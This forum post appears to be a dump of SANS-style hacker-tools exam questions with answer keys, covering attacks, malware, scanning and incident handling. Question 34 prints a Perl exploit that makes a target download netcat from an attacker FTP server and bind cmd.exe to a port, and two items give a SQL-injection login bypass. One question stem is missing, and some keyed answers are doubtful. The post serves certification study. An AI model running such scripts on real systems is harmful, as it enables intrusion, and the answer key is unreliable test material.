Question 1 ( Topic 1 )
Which of the following refers to the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system?
A. Piggybacking
B. Hacking
C. Session hijacking
D. Keystroke logging
Answer : C
Question 2 ( Topic 1 )
Which of the following is a network worm that exploits the RPC sub-system vulnerability present in the Microsoft Windows operating system?
A. Win32/Agent
B. WMA/TrojanDownloader.GetCodec
C. Win32/Conflicker
D. Win32/PSW.OnLineGames
Answer : C
Question 3 ( Topic 1 )
You are responsible for security at a company that uses a lot of Web applications. You are most concerned about flaws in those applications allowing some attacker to get into your network. What method would be best for finding such flaws?
A. Manual penetration testing
B. Code review
C. Automated penetration testing
D. Vulnerability scanning
Answer : D
Question 4 ( Topic 1 )
Which of the following is designed to protect the Internet resolvers (clients) from forged
DNS data created by DNS cache poisoning?
A. Stub resolver
B. BINDER
C. Split-horizon DNS
D. Domain Name System Extension (DNSSEC)
Answer : D
Question 5 ( Topic 1 )
Adam, a malicious hacker, wants to perform a reliable scan against a remote target. He is not concerned about being stealth at this point.
Which of the following type of scans would be most accurate and reliable?
A. UDP sacn
B. TCP Connect scan
C. ACK scan
D. Fin scan
Answer : B
Question 6 ( Topic 1 )
Which of the following is a computer worm that caused a denial of service on some Internet hosts and dramatically slowed down general Internet traffic?
A. Klez
B. Code red
C. SQL Slammer
D. Beast
Answer : C
Question 7 ( Topic 1 )
Your network is being flooded by ICMP packets. When you trace them down they come from multiple different IP addresses. What kind of attack is this?
A. Syn flood
B. Ping storm
C. Smurf attack
D. DDOS
Answer : D
Question 8 ( Topic 1 )
Which of the following tools can be used for stress testing of a Web server?
Each correct answer represents a complete solution. Choose two.
A. Internet bots
B. Scripts
C. Anti-virus software
D. Spyware
Answer : A,B
Question 9 ( Topic 1 )
John works as a Professional Penetration Tester. He has been assigned a project to test the Website security of www.we-are-secure Inc. On the We-are-secure Website login page, he enters ='or''=' as a username and successfully logs on to the user page of the Web site.
Now, John asks the we-aresecure Inc. to improve the login page PHP script. Which of the following suggestions can John give to improve the security of the we-are-secure Website login page from the SQL injection attack?
A. Use the escapeshellarg() function
B. Use the session_regenerate_id() function
C. Use the mysql_real_escape_string() function for escaping input
D. Use the escapeshellcmd() function
Answer : C
Question 10 ( Topic 1 )
The Klez worm is a mass-mailing worm that exploits a vulnerability to open an executable attachment even in Microsoft Outlook's preview pane. The Klez worm gathers email addresses from the entries of the default Windows Address Book (WAB). Which of the following registry values can be used to identify this worm?
A. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
B. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
C. HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name = "file and pathname of the WAB file"
D. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Answer : C
Question 11 ( Topic 1 )
Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to secure access to the network of the company from all possible entry points. He segmented the network into several subnets and installed firewalls all over the network. He has placed very stringent rules on all the firewalls, blocking everything in and out except the ports that must be used. He does need to have port 80 open since his company hosts a website that must be accessed from the Internet. Adam is still worried about the programs like Hping2 that can get into a network through covert channels.
Which of the following is the most effective way to protect the network of the company from an attacker using Hping2 to scan his internal network?
A. Block all outgoing traffic on port 21
B. Block all outgoing traffic on port 53
C. Block ICMP type 13 messages
D. Block ICMP type 3 messages
Answer : C
Question 12 ( Topic 1 )
John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. On the We-are-secure login page, he enters ='or''=' as a username and successfully logs in to the user page of the Web site.
The we-are-secure login page is vulnerable to a __________.
A. Dictionary attack
B. SQL injection attack
C. Replay attack
D. Land attack
Answer : B
Question 13 ( Topic 1 )
Which of the following tools is used to download the Web pages of a Website on the local system?
A. wget
B. jplag
C. Nessus
D. Ettercap
Answer : A
Question 14 ( Topic 1 )
Which of the following statements are true about session hijacking?
Each correct answer represents a complete solution. Choose all that apply.
A. Use of a long random number or string as the session key reduces session hijacking.
B. It is used to slow the working of victim's network resources.
C. TCP session hijacking is when a hacker takes over a TCP session between two machines.
D. It is the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system.
Answer : A,C,D
Question 15 ( Topic 1 )
You see the career section of a company's Web site and analyze the job profile requirements. You conclude that the company wants professionals who have a sharp knowledge of Windows server 2003 and Windows active directory installation and placement. Which of the following steps are you using to perform hacking?
A. Scanning
B. Covering tracks
C. Reconnaissance
D. Gaining access
Answer : C
Question 16 ( Topic 1 )
Which of the following are the primary goals of the incident handling team?
Each correct answer represents a complete solution. Choose all that apply.
A. Freeze the scene.
B. Repair any damage caused by an incident.
C. Prevent any further damage.
D. Inform higher authorities.
Answer : A,B,C
Question 17 ( Topic 1 )
You work as a System Engineer for Cyber World Inc. Your company has a single Active server role has been installed on one of the servers, namely uC1. uC1 hosts twelve virtual machines. You have been given the task to configure the Shutdown option for uC1, so that each virtual machine shuts down before the main Hyper-V server shuts down.
Which of the following actions will you perform to accomplish the task?
A. Enable the Shut Down the Guest Operating System option in the Automatic Stop Action Properties on each virtual machine.
B. Manually shut down each of the guest operating systems before the server shuts down.
C. Create a batch file to shut down the guest operating system before the server shuts down.
D. Create a logon script to shut down the guest operating system before the server shuts down.
Answer : A
Question 18 ( Topic 1 )
Which of the following takes control of a session between a server and a client using utility?
A. Dictionary attack
B. Session Hijacking
C. Trojan horse
D. Social Engineering
Answer : B
Question 19 ( Topic 1 )
You have configured a virtualized Internet browser on your Windows XP professional computer. Using the virtualized Internet browser, you can protect your operating system from which of the following?
A. Brute force attack
B. Mail bombing
C. Distributed denial of service (DDOS) attack
D. Malware installation from unknown Web sites
Answer : D
Question 20 ( Topic 1 )
Which of the following tools is used for vulnerability scanning and calls Hydra to launch a dictionary attack?
A. Whishker
B. Nessus
C. SARA
D. Nmap
Answer : B
Question 21 ( Topic 1 )
You work as a Network Administrator for Infonet Inc. The company has a Windows Server
2008 Active Directory-based single domain single forest network. The company has three
Windows 2008 file servers, 150 Windows XP Professional, thirty UNIX-based client computers. The network users have identical user accounts for both Active Directory and the UNIX realm. You want to ensure that the UNIX clients on the network can access the file servers. You also want to ensure that the users are able to access all resources by logging on only once, and that no additional software is installed on the UNIX clients. What will you do to accomplish this task?
Each correct answer represents a part of the solution. Choose two.
A. Configure a distributed file system (Dfs) on the file server in the network.
B. Enable the Network File System (NFS) component on the file servers in the network.
C. Configure ADRMS on the file servers in the network.
D. Enable User Name Mapping on the file servers in the network.
Answer : B,D
Question 22 ( Topic 1 )
Which of the following is the best method of accurately identifying the services running on a victim host?
A. Use of the manual method of telnet to each of the open ports.
B. Use of a port scanner to scan each port to confirm the services running.
C. Use of hit and trial method to guess the services and ports of the victim host.
D. Use of a vulnerability scanner to try to probe each port to verify which service is running.
Answer : A
Question 23 ( Topic 1 )
Adam works as a Network Administrator for PassGuide Inc. He wants to prevent the network from DOS attacks. Which of the following is most useful against DOS attacks?
A. SPI
B. Distributive firewall
C. Honey Pot
D. Internet bot
Answer : A
Question 24 ( Topic 1 )
Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to test the network security of the company. He created a webpage to discuss the progress of the tests with employees who were interested in following the test. Visitors were allowed to click on a company's icon to mark the progress of the test. Adam successfully embeds a keylogger. He also added some statistics on the webpage. The firewall protects the network well and allows strict Internet access.
How was security compromised and how did the firewall respond?
A. The attack was social engineering and the firewall did not detect it.
B. Security was not compromised as the webpage was hosted internally.
C. The attack was Cross Site Scripting and the firewall blocked it.
D. Security was compromised as keylogger is invisible for firewall.
Answer : A
Question 25 ( Topic 1 )
In which of the following DoS attacks does an attacker send an ICMP packet larger than
65,536 bytes to the target system?
A. Ping of death
B. Jolt
C. Fraggle
D. Teardrop
Answer : A
Question 26 ( Topic 1 )
You work as a Network Administrator for InformSec Inc. You find that the TCP port number
23476 is open on your server. You suspect that there may be a Trojan named Donald Dick installed on your server. Now you want to verify whether Donald Dick is installed on it or not. For this, you want to know the process running on port 23476, as well as the process id, process name, and the path of the process on your server. Which of the following applications will you most likely use to accomplish the task?
A. Tripwire
B. SubSeven
C. Netstat
D. Fport
Answer : D
Question 27 ( Topic 1 )
You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP- based network. An attacker uses software that keeps trying password combinations until the correct password is found. Which type of attack is this?
A. Denial-of-Service
B. Man-in-the-middle
C. Brute Force
D. Vulnerability
Answer : C
Question 28 ( Topic 1 )
Buffer overflows are one of the major errors used for exploitation on the Internet today. A buffer overflow occurs when a particular operation/function writes more data into a variable than the variable was designed to hold.
Which of the following are the two popular types of buffer overflows?
Each correct answer represents a complete solution. Choose two.
A. Dynamic buffer overflows
B. Stack based buffer overflow
C. Heap based buffer overflow
D. Static buffer overflows
Answer : B,C
Question 29 ( Topic 1 )
Which of the following Incident handling process phases is responsible for defining rules, collaborating human workforce, creating a back-up plan, and testing the plans for an enterprise?
A. Preparation phase
B. Eradication phase
C. Identification phase
D. Recovery phase
E. Containment phase
Answer : A
Question 30 ( Topic 1 )
Which of the following types of attacks is only intended to make a computer resource unavailable to its users?
A. Denial of Service attack
B. Replay attack
C. Teardrop attack
D. Land attack
Answer : A
Question 31 ( Topic 1 )
John, a part-time hacker, has accessed in unauthorized way to the www.yourbank.com banking Website and stolen the bank account information of its users and their credit card numbers by using the SQL injection attack. Now, John wants to sell this information to malicious person Mark and make a deal to get a good amount of money. Since, he does not want to send the hacked information in the clear text format to Mark; he decides to send information in hidden text. For this, he takes a steganography tool and hides the information in ASCII text by appending whitespace to the end of lines and encrypts the hidden information by using the IDEA encryption algorithm. Which of the following tools is
John using for steganography?
A. Image Hide
B. 2Mosaic
C. Snow.exe
D. Netcat
Answer : C
Question 32 ( Topic 1 )
You run the following command while using Nikto Web scanner:
perl nikto.pl -h 192.168.0.1 -p 443
What action do you want to perform?
A. Using it as a proxy server
B. Updating Nikto
C. Seting Nikto for network sniffing
D. Port scanning
Answer : D
Question 33 ( Topic 1 )
Which of the following is spy software that records activity on Macintosh systems via snapshots, keystrokes, and Web site logging?
A. Spector
B. Magic Lantern
C. eblaster
D. NetBus
Answer : A
Question 34 ( Topic 1 )
Adam, a malicious hacker performs an exploit, which is given below:
#####################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = '[email protected]';# password
#####################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";
#system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?
A. Creates a share called "sasfile" on the target system
B. Creates an FTP server with write permissions enabled
C. Opens up a SMTP server that requires no username or password
D. Opens up a telnet listener that requires no username or password
Answer : D
Question 35 ( Topic 1 )
Which of the following password cracking attacks is based on a pre-calculated hash table to retrieve plain text passwords?
A. Rainbow attack
B. Brute Force attack
C. Dictionary attack
D. Hybrid attack
Answer : A
Question 36 ( Topic 1 )
Which of the following types of attacks is the result of vulnerabilities in a program due to poor programming techniques?
A. Evasion attack
B. Denial-of-Service (DoS) attack
C. Ping of death attack
D. Buffer overflow attack
Answer : D
Question 37 ( Topic 1 )
Which of the following methods can be used to detect session hijacking attack?
A. nmap
B. Brutus
C. ntop
D. sniffer
Answer : D
Question 38 ( Topic 1 )
is true?
A. It manages security credentials and public keys for message encryption.
B. It is a collection of files used by Microsoft for software updates released between major service pack releases.
C. It is a condition in which an application receives more data than it is configured to accept.
D. It is a false warning about a virus.
Answer : C
Question 39 ( Topic 1 )
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He finds that the We-are-secure server is vulnerable to attacks. As a countermeasure, he suggests that the Network Administrator should remove the IPP printing capability from the server. He is suggesting this as a countermeasure against __________.
A. IIS buffer overflow
B. NetBIOS NULL session
C. SNMP enumeration
D. DNS zone transfer
Answer : A
Question 40 ( Topic 1 )
Adam has installed and configured his wireless network. He has enabled numerous security features such as changing the default SSID, enabling WPA encryption, and enabling MAC filtering on his wireless router. Adam notices that when he uses his wireless connection, the speed is sometimes 16 Mbps and sometimes it is only 8 Mbps or less.
Adam connects to the management utility wireless router and finds out that a machine with an unfamiliar name is connected through his wireless connection. Paul checks the router's logs and notices that the unfamiliar machine has the same MAC address as his laptop.
Which of the following attacks has been occurred on the wireless network of Adam?
A. NAT spoofing
B. DNS cache poisoning
C. MAC spoofing
D. ARP spoofing
Answer : C
Question 41 ( Topic 1 )
Which of the following is a technique of using a modem to automatically scan a list of telephone numbers, usually dialing every number in a local area code to search for computers, Bulletin board systems, and fax machines?
A. Demon dialing
B. Warkitting
C. War driving
D. Wardialing
Answer : D
Question 42 ( Topic 1 )
Which of the following tools can be used to detect the steganography?
A. Dskprobe
B. Blindside
C. ImageHide
D. Snow
Answer : A
Question 43 ( Topic 1 )
Which of the following statements are true about a keylogger?
Each correct answer represents a complete solution. Choose all that apply.
A. It records all keystrokes on the victim's computer in a predefined log file.
B. It can be remotely installed on a computer system.
C. It is a software tool used to trace all or specific activities of a user on a computer.
D. It uses hidden code to destroy or scramble data on the hard disk.
Answer : A,B,C
Question 44 ( Topic 1 )
Which of the following commands can be used for port scanning?
A. nc -t
B. nc -z
C. nc -w
D. nc -g
Answer : B
Question 45 ( Topic 1 )
You work as a Penetration Tester for the Infosec Inc. Your company takes the projects of security auditing. Recently, your company has assigned you a project to test the security of the we-aresecure.com Web site. For this, you want to perform the idle scan so that you can get the ports open in the we-are-secure.com server. You are using Hping tool to perform the idle scan by using a zombie computer. While scanning, you notice that every IPID is being incremented on every query, regardless whether the ports are open or close.
Sometimes, IPID is being incremented by more than one value.
What may be the reason?
A. The firewall is blocking the scanning process.
B. The zombie computer is not connected to the we-are-secure.com Web server.
C. The zombie computer is the system interacting with some other system besides your computer.
D. Hping does not perform idle scanning.
Answer : C
Question 46 ( Topic 1 )
Which of the following are types of access control attacks?
Each correct answer represents a complete solution. Choose all that apply.
A. Spoofing
B. Brute force attack
C. Dictionary attack
D. Mail bombing
Answer : A,B,C
Question 47 ( Topic 1 )
Which of the following Nmap commands is used to perform a UDP port scan?
A. nmap -sY
B. nmap -sS
C. nmap -sN
D. nmap -sU
Answer : D
Question 48 ( Topic 1 )
Which of the following characters will you use to check whether an application is vulnerable to an SQL injection attack?
A. Dash (-)
B. Double quote (")
C. Single quote (')
D. Semi colon (;)
Answer : C
Question 49 ( Topic 1 )
Which of the following attacks come under the category of layer 2 Denial-of-Service attacks?
Each correct answer represents a complete solution. Choose all that apply.
A. Spoofing attack
B. SYN flood attack
C. Password cracking
D. RF jamming attack
Answer : A,B
Question 50 ( Topic 1 )
You check performance logs and note that there has been a recent dramatic increase in the amount of broadcast traffic. What is this most likely to be an indicator of?
A. Virus
B. Syn flood
C. Misconfigured router
D. DoS attack
Answer : D
Question 51 ( Topic 1 )
Which of the following Denial-of-Service (DoS) attacks employ IP fragmentation mechanism?
Each correct answer represents a complete solution. Choose two.
A. Land attack
B. SYN flood attack
C. Teardrop attack
D. Ping of Death attack
Answer : C,D
Question 52 ( Topic 1 )
Which of the following applications is an example of a data-sending Trojan?
A. SubSeven
B. Senna Spy Generator
C. Firekiller 2000
D. eBlaster
Answer : D
Question 53 ( Topic 1 )
Which of the following statements are true about firewalking?
Each correct answer represents a complete solution. Choose all that apply.
A. To use firewalking, the attacker needs the IP address of the last known gateway before the firewall and the IP address of a host located behind the firewall.
B. In this technique, an attacker sends a crafted packet with a TTL value that is set to expire one hop past the firewall.
C. A malicious attacker can use firewalking to determine the types of ports/protocols that can bypass the firewall.
D. Firewalking works on the UDP packets.
Answer : A,B,C
Question 54 ( Topic 1 )
Network mapping provides a security testing team with a blueprint of the organization.
Which of the following steps is NOT a part of manual network mapping?
A. Gathering private and public IP addresses
B. Collecting employees information
C. Banner grabbing
D. Performing Neotracerouting
Answer : D
Question 55 ( Topic 1 )
You work as a Network Administrator for Net Perfect Inc. The company has a Windows- based network. The company wants to fix potential vulnerabilities existing on the tested systems. You use Nessus as a vulnerability scanning program to fix the vulnerabilities.
Which of the following vulnerabilities can be fixed using Nessus?
Each correct answer represents a complete solution. Choose all that apply.
A. Misconfiguration (e.g. open mail relay, missing patches, etc.)
B. Vulnerabilities that allow a remote cracker to control sensitive data on a system
C. Vulnerabilities that allow a remote cracker to access sensitive data on a system
D. Vulnerabilities that help in Code injection attacks
Answer : A,B,C
Hacker Tools, Techniques, Exploits and Incident Handling (SANS)
-
answerhappygod
- Site Admin
- Posts: 899603
- Joined: Mon Aug 02, 2021 8:13 am